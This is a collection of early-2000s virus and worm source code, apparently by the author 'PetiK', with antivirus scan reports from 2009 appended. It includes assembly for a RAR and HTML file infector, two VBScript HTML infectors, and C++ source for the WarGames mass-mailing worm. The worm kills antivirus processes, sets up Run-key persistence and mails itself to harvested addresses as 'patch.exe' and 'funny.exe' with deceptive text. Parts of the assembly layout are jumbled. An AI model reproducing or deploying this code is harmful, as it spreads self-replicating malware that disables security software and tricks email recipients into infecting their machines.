@mes "This virus infects only RAR files.",0dh,0ah "Happy Birthday - (c)2002",0 0 MessageBoxA 50 esi,offset orig_virus esi 0 GetModuleFileNameA 4 1000h 8192 0 VirtualAlloc eax,eax end_srch_rar dword ptr [mHnd],eax 0 80h 3 0 1 80000000h offset orig_virus CreateFileA eax,-1 end_srch_rar dword ptr [fHnd],eax 0 dword ptr [sizer],0 eax,sizer eax 8192 dword ptr [mHnd] dword ptr [fHnd] ReadFile dword ptr [mHnd] CloseHandle offset ffile offset rarmask FindFirstFileA eax end_srch_rar eax dword ptr [hFile],eax times infect byte ptr [Err],1 rar_nxt_srch timer

rar_nxt_srch: push offset ffile mov eax,dword ptr [hFile] push eax

api FindNextFileA test eax,eax jnz inf_rar mov eax,dword ptr [hFile] push eax api FindClose end_srch_rar: htm_srch: push push api dec jz inc mov inf_htm: call offset ffile offset htmmask FindFirstFileA eax end_srch_htm eax dword ptr [hFile],eax infecthtm

htm_nxt_srch: push offset ffile mov eax,dword ptr [hFile] push eax api FindNextFileA test eax,eax jnz inf_htm mov eax,dword ptr [hFile] push eax api FindClose end_srch_htm: end_linda: push api times: push push push push push push api cmp je mov push push push push api push api mov ret tserr: ret timer: push push push push push push api cmp je mov push push push push api push api

0 ExitProcess push 0 80h 3 0 1 80000000h offset ffile.cFileName CreateFileA eax,-1 tserr dword ptr [thFile],eax offset time0 offset time1 offset time2 dword ptr [thFile] GetFileTime dword ptr [thFile] CloseHandle byte ptr [Err],0 mov byte ptr [Err],1

push 0 80h 3 0 1 40000000h offset ffile.cFileName CreateFileA eax,-1 trerr dword ptr [thFile],eax offset time0 offset time1 offset time2 dword ptr [thFile] SetFileTime dword ptr [thFile] CloseHandle

trerr:

ret

infecthtm: push offset ffile.cFileName api GetFileAttributesA cmp eax,1 or 20h je end_inf_htm push 0 push 80h push 3 push 0 push 1 push 40000000h push offset ffile.cFileName api CreateFileA cmp eax,-1 je end_inf_htm mov dword ptr [fHnd],eax push 2 push 0 push dword ptr [fHnd] api _llseek push 0 push offset octets push e_htm - s_htm call e_htm s_htm: db "",CRLF,CRLF db "<SCRIPT Language=VBScript>",CRLF db "On Error Resume Next",CRLF db "document.Write ""<font face='verdana' color=green size='2'>Hi guy ! How are you ?" db "<br>If you read these lines, is that you are infected by my Virus Linda." db "<br>Look at your RAR files. They could be infected too." db "<br>Good Bye and have a nice day.<br></font>""",0dh,0ah db "</SCRIPT>",0dh,0ah e_htm: push dword ptr [fHnd] api WriteFile push dword ptr [fHnd] api CloseHandle push 1 or 20h push offset ffile.cFileName api SetFileAttributesA end_inf_htm: ret

infect: push push push push push push lea push api dec jz inc mov push push push api mov mov call mov mov mov call mov

xor eax,eax eax 80h 3 eax eax 40000000h eax,ffile.cFileName eax CreateFileA eax end_infect eax dword ptr [fHnd],eax 2 0 dword ptr [fHnd] _llseek esi,dword ptr [mHnd] edi,Size CRC32 dword ptr [RARCrc32],eax esi,offset RARHeader+2 edi,HeaderSize-2 CRC32 word ptr [RARHeaderCRC],ax

; like SetFilePointer

xor push push push push push api mov mov mov push push push push push api push api end_infect: ret

eax,eax eax offset octets HeaderSize offset RARHeader dword ptr [fHnd] WriteFile dword ptr [RARHeaderCRC],0 dword ptr [RARCrc32],0 dword ptr [RARCrc32+2],0 0 offset octets Size dword ptr [mHnd] dword ptr [fHnd] WriteFile dword ptr [fHnd] CloseHandle

CRC32: cld push ebx mov ecx,-1 mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec di jnz NextByteCRC not edx not ecx pop ebx mov eax,edx rol eax,16 mov ax,cx ret ends end start_linda

;xor ecx,ecx & dec ecx

File w32linda32.exe received on 05.16.2009 19:48:06 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Worm.Win32.Petik!IK Win32/Petik.worm.8192.C Worm/Petik.AP1 Worm/Win32.Win32 W32/Malware!c1a4 Win32:Agent-XPK Worm/Linda Win32.Linda.A Win32.Linda Worm.Win32.Petik.Linda Win32.Petik.4096 Win32.Petik HTML/Linad W32/Malware!c1a4 Worm.Win32.Petik W32/Petik!worm.p2p Win32.Linda.A Worm.Win32.Petik Worm.Win32.Petik Worm.Win32.Petik W32/Linda.worm W32/Linda.worm Worm.Petik.AP1 Worm:Win32/Linra.A Win32/Petik.Linda W32/Pet_Tick.8192.E Univ.AP.F Worm.Petik High Risk Worm Worm.Win32.Petik.a W32/Petik-S Worm.Win32.Petik W95.Pet_Tick.gen W32/Petik PE_LINDA.A Win32.Worm.Petik Worm.Win32.Petik.8192 Worm.Petik.AG

Additional information File size: 8192 bytes MD5...: 2bdfd3609d98f54cc1c8fc7e3f5e925c SHA1..: 1e1c42c4d1cefd930ca37e60ba8689f3d0da174c PEiD..: ASPack v2.12

<macrophage> <html><head><title>Internet Explo$er</title></head><body> <script language=vbscript> On Error Resume Next set fso=createobject("scripting.filesystemobject") If err.number=429 then document.write "<font face='Lucida Console' size='2' color=black>You need ActiveX enabled to see this file<br><a href='javascript:location.reload()'>Click Here</a> to reload and click Yes</font>" Else Set ws=CreateObject("WScript.Shell") cache=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache") cook=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies") desk=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop") favor=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Favorites") pers=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal") infect(fso.GetSpecialFolder(0)) infect(fso.GetSpecialFolder(1)) infect(fso.GetSpecialFolder(2)) infect(cache) infect(cook) infect(desk) infect(favor) infect(pers) If Day(Now())=10 Then document.write "<font face='verdana' size='2' color=black>Sorry but your browser can't read this page.<br>Try an another day.<br></font>" document.write "<font face='verdana' size='2' color=blue><br>GOOD BYE and HAVE A NICE DAY.</font>" End If End If Function infect(doss) Set FolderObj = FSO.GetFolder(doss) Set FO = FolderObj.Files For each cible in FO ext = lcase(FSO.GetExtensionName(cible.Name)) if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then Set good = fso.OpenTextFile(cible.path, 1, False) if good.readline <> "<macrophage>" Then good.close() Set good = fso.OpenTextFile(cible.path, 1, False) htmorg = good.ReadAll() good.close() Set virus = document.body.createTextRange Set good = fso.CreateTextFile(cible.path, True, False) good.WriteLine "<macrophage>" good.Write(htmorg) good.WriteLine virus.htmltext good.Close() else good.close() end if end if next End Function </script></html>

File Macrophage.htm received on 05.16.2009 17:51:50 Antivirus Version a-squared 4.0.0.101 AhnLab-V3 5.0.0.2 AntiVir 7.9.0.168 Antiy-AVL 2.0.3.1 Authentium 5.1.2.4 Avast 4.8.1335.0 AVG 8.5.0.336 BitDefender 7.2 CAT-QuickHeal 10.00 ClamAV 0.94.1 Comodo 1157 DrWeb 5.0.0.12182 eSafe 7.0.17.0 eTrust-Vet 31.6.6508 F-Prot 4.4.4.56 F-Secure 8.0.14470.0 Fortinet 3.117.0.0 GData 19 Ikarus T3.1.1.49.0 K7AntiVirus 7.10.737 Kaspersky 7.0.0.125 McAfee 5616 McAfee+Artemis 5616 McAfee-GW-Edition 6.7.6 Microsoft 1.4602 NOD32 4080 Norman 6.01.05 nProtect 2009.1.8.0 Panda 10.0.0.14 PCTools 4.4.2.0 Prevx 3.0 Rising 21.29.52.00 Sophos 4.41.0 Sunbelt 3.2.1858.2 Symantec 1.4.4.12 TheHacker 6.3.4.1.326 TrendMicro 8.950.0.1092 VBA32 3.12.10.5 ViRobot 2009.5.15.1737 VirusBuster 4.6.5.0 Additional information File size: 2226 bytes MD5...: fee8a8a543264ddb70fa00cfbd10625b SHA1..: 800f9ec17e06d88ecbe5979289e4f67847770561

(CET) Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16

Result Virus.VBS.Petik!IK HTML/Petik VBS/Petik.Good Virus/VBS.VBS VBS/Petik.K VBS:Malware-gen VBS/Rophage.A VBS.Petik.A VBS/Petik.K VBS.Macrophage VBS.Petik.a. VBS/Rophage VBS/Petik.K Virus.VBS.Petik VBS/Petik.K VBS.Petik.A Virus.VBS.Petik Virus.VBS.Petik VBS/Rophage VBS/Rophage Script.Petik.Good Virus:VBS/Petik VBS/Petik.B VBS/Petik.C VBS.Petik.A HTML/Mage VBS.Acroph.A VBS.Petik VBS.Prepend VBS_PETIK.B Virus.VBS.Petik VBS.Acroph.A

/* Name : I-Worm.WarGames Author : PetiK Date : February 12th 2002 - February 22th 2002 Language : C++/Win32asm */ #include <stdio.h> #include <windows.h> #include <mapi.h> #include <tlhelp32.h> #pragma argused #pragma inline char int char char LPSTR filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50]; num,counter=0; *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m", "n","o","p","q","r","s","t","u","v","w","x","y","z"}; dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";

SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"; BYTE desktop[50],favoris[50],personal[50],cache[50],page[150]; DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris), sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page); DWORD type=REG_SZ; FILE *vbsworm,*winstart; HANDLE lSnapshot,myproc; BOOL rProcessFound; LHANDLE session; MapiMessage mess; MapiMessage *mes; MapiRecipDesc from; char messId[512],mname[50],maddr[30]; HINSTANCE hMAPI; WIN32_FIND_DATA PROCESSENTRY32 HKEY SYSTEMTIME void void void void ULONG ULONG ULONG ULONG ULONG ULONG ffile; uProcess; hReg; wartime;

StopAV(char *); FindFile(char *,char *); GetMail(char *,char *); sendmail(char *); (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL (PASCAL FAR FAR FAR FAR FAR FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG); *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG); *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE); *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR); *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *); *mFreeBuffer)(LPVOID);

int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow) { // Kill Some AntiVirus StopAV("AVP32.EXE"); // AVP StopAV("AVPCC.EXE"); // AVP StopAV("AVPM.EXE"); // AVP StopAV("WFINDV32.EXE"); // Dr. Solomon StopAV("F-AGNT95.EXE"); // F-Secure StopAV("NAVAPW32.EXE"); // Norton Antivirus StopAV("NAVW32.EXE"); // Norton Antivirus StopAV("NMAIN.EXE"); // Norton Antivirus StopAV("PAVSCHED.EXE"); // Panda AntiVirus StopAV("ZONEALARM.EXE"); // ZoneAlarm // Kill Some Worm StopAV("KERN32.EXE"); StopAV("SETUP.EXE"); StopAV("RUNDLLW32.EXE"); StopAV("GONER.SCR"); StopAV("LOAD.EXE"); StopAV("INETD.EXE"); StopAV("FILES32.VXD"); StopAV("SCAM32.EXE"); StopAV("GDI32.EXE"); // // // // // // // // // I-Worm.Badtrans I-Worm.Cholera I-Worm.Gift I-Worm.Goner I-Worm.Nimda I-Worm.Plage - BadTrans I-Worm.PrettyPark I-Worm.Sircam I-Worm.Sonic

StopAV("_SETUP.EXE"); StopAV("EXPLORE.EXE"); StopAV("ZIPPED_FILES.EXE");

// I-Worm.ZippedFiles // I-Worm.ZippedFiles // I-Worm.ZippedFiles

GetModuleFileName(hInst,filename,100); GetSystemDirectory((char *)sysdir,100); SetCurrentDirectory(sysdir); CopyFile(filename,"article.doc.exe",TRUE); RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\ \WarGames Worm",&hReg); RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20); RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40); RegCloseKey(hReg); randomize(); num=rand() % 10; randname: strcat(copyr,alph[GetTickCount()%25]); if(++counter==num) { strcat(copyr,".exe"); MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION); CopyFile(filename,copyr,FALSE); WriteProfileString("WINDOWS","RUN",copyr); WritePrivateProfileString("rename","NUL",filename,"WININIT.INI"); goto endrandname; } Sleep(GetTickCount()%100); goto randname; endrandname: hMAPI=LoadLibrary("MAPI32.DLL"); (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail"); RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg); RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop); RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris); RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal); RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache); RegCloseKey(hReg); GetWindowsDirectory((char *)winhtm,100); _asm { call @wininet db "WININET.DLL",0 @wininet: call LoadLibrary test eax,eax jz end_asm mov ebp,eax call @inetconnect db "InternetGetConnectedState",0 @inetconnect: push ebp call GetProcAddress test eax,eax jz end_wininet mov edi,eax verf: push 0 push Tmp call edi dec eax jnz verf end_wininet: push ebp call FreeLibrary end_asm: jmp end_all_asm Tmp dd 0

end_all_asm: } FindFile(desktop,"*.htm"); FindFile(desktop,"*.doc"); FindFile(favoris,"*.ht*");

FindFile(personal,"*.ht*"); FindFile(personal,"*.doc"); FindFile(personal,"*.xls"); FindFile(personal,"*.asp"); FindFile(cache,".ht*"); FindFile(cache,".php"); FindFile(cache,".asp"); FindFile(winhtm,".ht*"); FindFile(winhtm,".doc"); vbsworm=fopen("wargames.vbs","w"); fprintf(vbsworm,"On Error Resume Next\n"); fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34); fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34); fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n"); fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34); fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34); fprintf(vbsworm,"For Each C In MA.AddressLists\n"); fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n"); fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n"); fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n"); fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n"); fprintf(vbsworm,"EM.To=AD.Address\n"); fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34); fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34); fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34); fprintf(vbsworm,"EM.Body=body\n"); fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34); fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n"); fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34); fprintf(vbsworm,"EM.Send\n"); fprintf(vbsworm,"End If\n"); fprintf(vbsworm,"Next\n"); fprintf(vbsworm,"End If\n"); fprintf(vbsworm,"Next\n"); fclose(vbsworm); ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL); Sleep(5000); DeleteFile("wargames.vbs"); (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon"); (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff"); (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext"); (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail"); (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer"); mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session); if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) { do { if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY| MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) { strcpy(mname,mes->lpOriginator->lpszName); strcpy(maddr,mes->lpOriginator->lpszAddress); mes->ulReserved=0; mes->lpszSubject="Re: Fw:"; mes->lpszNoteText="I received your mail but I cannot reply immediatly.\n" "I send you a nice program. Look at this.\n\n" " See you soon."; mes->lpszMessageType=NULL; mes->lpszDateReceived=NULL; mes->lpszConversationID=NULL; mes->flFlags=MAPI_SENT; mes->lpOriginator->ulReserved=0; mes->lpOriginator->ulRecipClass=MAPI_ORIG; mes->lpOriginator->lpszName=mes->lpRecips->lpszName; mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress; mes->nRecipCount=1; mes->lpRecips->ulReserved=0; mes->lpRecips->ulRecipClass=MAPI_TO; mes->lpRecips->lpszName=mname; mes->lpRecips->lpszAddress=maddr; mes->nFileCount=1; mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); memset(mes->lpFiles, 0, sizeof(MapiFileDesc)); mes->lpFiles->ulReserved=0; mes->lpFiles->flFlags=NULL; mes->lpFiles->nPosition=-1; mes->lpFiles->lpszPathName=filename;

mes->lpFiles->lpszFileName="funny.exe"; mes->lpFiles->lpFileType=NULL; mSendMail(session, NULL, mes, NULL, NULL); } }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS); free(mes->lpFiles); mFreeBuffer(mes); mLogoff(session,0,0,0); FreeLibrary(hMAPI); } } void FindFile(char *folder, char *ext) { register bool abc=TRUE; register HANDLE hFile; char mail[128]; SetCurrentDirectory(folder); hFile=FindFirstFile(ext,&ffile); if(hFile!=INVALID_HANDLE_VALUE) { while(abc) { SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE); GetMail(ffile.cFileName,mail); if(strlen(mail)>0) { sendmail(mail); } abc=FindNextFile(hFile,&ffile); } } } void GetMail(char *namefile, char *mail) { HANDLE hf,hf2; char *mapped; DWORD size,i,k; BOOL test=FALSE,valid=FALSE; mail[0]=0; hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIV E,0); if(hf==INVALID_HANDLE_VALUE) return; size=GetFileSize(hf,NULL); if(!size) return; if(size<8) return; size-=100; hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0); if(!hf2) { CloseHandle(hf); return; } mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0); if(!mapped) { CloseHandle(hf2); CloseHandle(hf); return; } i=0; while(i<size && !test) { if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) { test=TRUE; i+=strlen("mailto:"); k=0; while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) { if(mapped[i]!=' ') { mail[k]=mapped[i]; k++; if(mapped[i]=='@') valid=TRUE;

} i++; } mail[k]=0; } else i++; } if(!valid) mail[0]=0; UnmapViewOfFile(mapped); CloseHandle(hf2); CloseHandle(hf); return; } void sendmail(char *tos) { memset(&mess,0,sizeof(MapiMessage)); memset(&from,0,sizeof(MapiRecipDesc)); wsprintf(subj,"Mail to %s.",tos); from.lpszName=NULL; from.ulRecipClass=MAPI_ORIG; mess.lpszSubject=subj; mess.lpszNoteText="I send you this patch.\n" "It corrects a bug into Internet Explorer and Outlook.\n\n" " Have a nice day. Best Regards."; mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc)); if(!mess.lpRecips) return; memset(mess.lpRecips,0,sizeof(MapiRecipDesc)); mess.lpRecips->lpszName=tos; mess.lpRecips->lpszAddress=tos; mess.lpRecips->ulRecipClass=MAPI_TO; mess.nRecipCount=1; mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc)); if(!mess.lpFiles) return; memset(mess.lpFiles,0,sizeof(MapiFileDesc)); mess.lpFiles->lpszPathName=filename; mess.lpFiles->lpszFileName="patch.exe"; mess.nFileCount=1; mess.lpOriginator=&from; mSendMail(0,0,&mess,0,0); free(mess.lpRecips); free(mess.lpFiles); } void StopAV(char *antivirus) { register BOOL term; lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); uProcess.dwSize=sizeof(uProcess); rProcessFound=Process32First(lSnapshot,&uProcess); while(rProcessFound) { if(strstr(uProcess.szExeFile,antivirus)!=NULL) { myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID); if(myproc!=NULL) { term=TerminateProcess(myproc,0); } CloseHandle(myproc); } rProcessFound=Process32Next(lSnapshot,&uProcess); } CloseHandle(lSnapshot); }

File WarGames.exe received on 05.16.2009 19:57:59 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Wargam!IK Win32/Warga.worm.77824 Worm/WarGame.1 Worm/Win32.Win32 W32/Malware!6ca1 Win32:Wargam-B I-Worm/Wargames Win32.WarGames.A@mm I-Worm.Wargam Worm.Wargam Worm.Win32.Warga.A Win32.HLLM.Warga Win32.Wargam Win32/Wargam W32/Malware!6ca1 Email-Worm.Win32.Wargam W32/Wargam.A@mm Win32.WarGames.A@mm Email-Worm.Win32.Wargam Email-Worm.Win32.Wargam Email-Worm.Win32.Wargam W32/Warga@MM W32/Warga@MM Worm.WarGame.1 Worm:Win32/Wargam.A@mm Win32/Warga.A W32/Pet_Tick.77824.A Worm/W32.Worgam.77824 W32/Wargam I-Worm.Petwrg.A High Risk Worm Worm.Wargames W32/Warga-A W32.Wargam.Worm W32.Wargam.Worm W32/Wargam WORM_WARGA.A Win32.HLLW.Wargames I-Worm.Win32.Wargame I-Worm.Petwrg.A

Additional information File size: 77824 bytes MD5...: f3f60781ccd4c9c429a1431f0162a295 SHA1..: d6ff0b428178a9898f1552a0d18e59b48686cb67

<html><head><title>Love Linda</title> <body bgColor=blue onLoad="window.status='I LOVE YOU Linda'"> <font face='verdana' color=yellow size='3'>For Linda...<br> <br>Because I Love You. <br>I code this.<br>I can't say what I feel for you. <br>You will know by this way.<br></font> <SCRIPT Language=VBScript> On Error Resume Next msgbox "Please accept the ActiveX",vbinformation,"Info" Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") If err.number=429 then ws.Run javascript:location.reload() Else Set win=fso.GetSpecialFolder(0) Set sys=fso.GetSpecialFolder(1) Set linda = fso.CreateTextFile(win&"\LoveLinda.htm", 2) Set love = document.body.createTextRange linda.WriteLine "<html><head><title>Love Linda</title>" linda.WriteLine "<body bgColor=blue>" linda.WriteLine love.htmltext linda.WriteLine "</body></html>" linda.Close pers=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal") create(win) create(sys) create(pers) cv="HKLM\Software\Microsoft\Windows\CurrentVersion" ws.RegWrite cv&"\RegisteredOwner","Linda" ws.RegWrite cv&"\RegisteredOrganization","Love Linda" ws.RegWrite cv&"\Run\LoveLinda",sys&"\lindamail.vbs" Set mail=fso.CreateTextFile(sys&"\lindamail.vbs", 2) mail.WriteLine "On Error Resume Next" mail.WriteLine "Set out=CreateObject(""Outlook.Application"")" mail.WriteLine "Set B=out.GetNameSpace(""MAPI"")" mail.WriteLine "For Each C In B.AddressLists" mail.WriteLine "If C.AddressEntries.Count <> 0 Then" mail.WriteLine "For D=1 To C.AddressEntries.count" mail.WriteLine "Set em=C.AddressEntries(D)" mail.WriteLine "Set lm=out.CreateItem(0)" mail.WriteLine "lm.To=em.Address" mail.WriteLine "lm.Subject=""Love Message...""" mail.WriteLine "lm.Body=""Read this beautiful love message.""" mail.WriteLine "lm.Attachments.Add(""" &win& "\LoveLinda.htm"")" mail.WriteLine "lm.DeleteAfterSubmit=True" mail.WriteLine "If lm.To <> """" Then" mail.WriteLine "F.Send" mail.WriteLine "End If" mail.WriteLine "Next" mail.WriteLine "End If" mail.WriteLine "Next" End If Function create(doss) Set FolderObj = fso.GetFolder(doss) Set FO = FolderObj.Files For each file in FO ext = lcase(fso.GetExtensionName(file.Name)) if ext="ini" or ext="txt" or ext="bmp" or ext="doc" or ext="xls" or ext="mp3" or ext="hlp" or ext="inf" Then Set linda = fso.CreateTextFile(file.path&".htm", 2) Set love = document.body.createTextRange linda.WriteLine "<html><head><title>Love Linda</title>" linda.WriteLine "<body bgColor=blue>" linda.WriteLine love.htmltext linda.WriteLine "</body></html>" linda.Close end if next End Function </script></body></html>

File Linda.htm received on 05.16.2009 17:51:29 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Bubbleboy!IK AhnLab-V3 5.0.0.2 2009.05.16 HTML/Petik AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.04 Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32 Authentium 5.1.2.4 2009.05.16 JS/Mailer.A Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen AVG 8.5.0.336 2009.05.15 I-Worm/Petik BitDefender 7.2 2009.05.16 Generic.ScriptWorm.CC1D1675 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.16 Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik DrWeb 5.0.0.12182 2009.05.16 WORM.Virus eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 VBS/Nilda F-Prot 4.4.4.56 2009.05.16 JS/Mailer.A F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.16 JS/Mailer.A GData 19 2009.05.16 Generic.ScriptWorm.CC1D1675 Ikarus 